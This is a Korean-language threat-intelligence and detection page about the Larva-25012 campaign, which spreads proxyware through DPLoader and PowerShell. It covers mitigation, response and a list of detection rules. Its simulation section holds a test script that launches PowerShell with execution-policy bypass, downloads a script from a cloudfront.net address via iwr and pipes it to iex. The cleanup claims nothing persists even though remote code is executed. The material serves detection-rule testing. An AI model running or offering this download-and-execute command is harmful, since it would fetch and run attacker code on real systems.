Larva-25012: 2026년 프록시웨어 배포 캠페인
Detection stack
- AIDR
- Alert
- ETL
- Query
요약
Larva-25012 위협 행위자는 사용자들의 인터넷 대역폭을 장악하여 감염된 시스템을 수익화하기 위해 Proxyware를 적극적으로 배포하고 있습니다. 이 캠페인은 기존의 DPLoader 감염을 기반으로 하며, YouTube 다운로드 웹사이트와 GitHub을 포함한 여러 배포 채널에 의존합니다. 이 악성 소프트웨어는 DigitalPulse, SOAX, Appsalt, IPRoyal 등을 포함한 여러 Proxyware 계열을 배포합니다.
조사
안랩 보안 인텔리전스 센터(ASEC)는 지속적인 프로시젹킹 활동을 추적하여 2026년 하반기 Larva-25012의 새로운 작전을 식별했습니다. 조사 결과, 공격자들은 지속성을 유지하고 PowerShell 명령을 실행하기 위해 DPLoader의 자바스크립트와 파이썬 변형을 사용함을 발견했습니다. 또한, 악성 스크립트가 감염된 시스템에서 계속 실행되도록 예약 작업도 생성됩니다.
완화
사용자는 의심스러운 웹사이트, 팝업 광고, 비공식 파일 공유 플랫폼에서 실행 파일을 다운로드하는 것을 피해야 합니다. 소프트웨어는 신뢰할 수 있는 합법적 소스에서만 얻어야 하며, 크랙된 애플리케이션과 불법 다운로드 사이트를 피해야 합니다. 조직은 V3를 포함한 엔드포인트 보호 솔루션을 최신 상태로 유지해야 합니다.
대응
의심스러운 활동이 감지되면, 관리자는 영향을 받은 Proxyware 계열과 관련된 악성 PowerShell 프로세스와 예약 작업을 식별하고 종료해야 합니다. 또한, 감염과 지속성의 주요 구성요소인 DPLoader를 시스템에서 검사해야 합니다. 알려졌거나 의심스러운 C2 인프라에 대한 미승인 연결을 위해 아웃바운드 네트워크 트래픽을 검토하세요.
공격 흐름
이 부분은 여전히 업데이트 중입니다.
탐지
PowerShell을 통한 다운로드 또는 업로드 (cmdline 통해)
의심스러운 NodeJS 자식 프로세스 [Windows] (cmdline 통해)
Windows Defender 실시간 모니터링 비활성화 및 기타 환경설정 변경 (cmdline 통해)
PowerShell에서 의심스러운 .NET 메소드 호출 (powershell 통해)
Cloudflare 개발 도메인 남용 가능성 (dns 통해)
Larva-25012를 탐지하기 위한 IOCs (HashMd5): 2026 Proxyware 배포 캠페인
PowerShell Proxyware 설치 스크립트 탐지 [Windows Powershell]
시뮬레이션 실행
-
공격 내러티브 및 명령: 대역폭을 비인가로 사용하기 위한 Proxyware(Larva-25012)를 설치하려는 적수는 PowerShell 원라이너를 실행합니다. 목표는 페이로드를 메모리로 직접 다운로드하여 로컬 파일 스캐닝을 우회하는 것입니다. 이들은
-ExecutionPolicy Bypass플래그를 사용하여 스크립트가 실행되도록 보장하고iwrCloudfront 배포에서 파일을 가져와iex즉시 실행하도록 파이핑합니다. 이 특정 명령 줄은 탐지 규칙의 목표 서명 중 하나입니다. -
회귀 테스트 스크립트:
# Larva-25012 Proxyware 설치 시뮬레이션 # 이 명령어는 탐지 규칙의 selection2에 맞추도록 특별히 설계되었습니다. $cmd = 'PowerShell.Exe -ExecutionPolicy Bypass -Command "iwr -UseBasicParsing -Uri http://dhrciu5akloar.cloudfront.net/63563545600333.ps1 | iex"' # 우리는 새 프로세스 이벤트로 명령줄이 캡처되도록 Start-Process를 사용합니다. Start-Process "powershell.exe" -ArgumentList "-ExecutionPolicy Bypass -Command `"iwr -UseBasicParsing -Uri http://dhrciu5akloar.cloudfront.net/63563545600333.ps1 | iex`"" -
정리 명령:
#'iex' 파이프의 특성상 실제로 다운로드된 파일은 없지만, 생성된 아티팩트가 있을 경우 이곳에서 삭제됩니다. Write-Host "시뮬레이션 정리 완료. 지속적 아티팩트가 생성되지 않았습니다."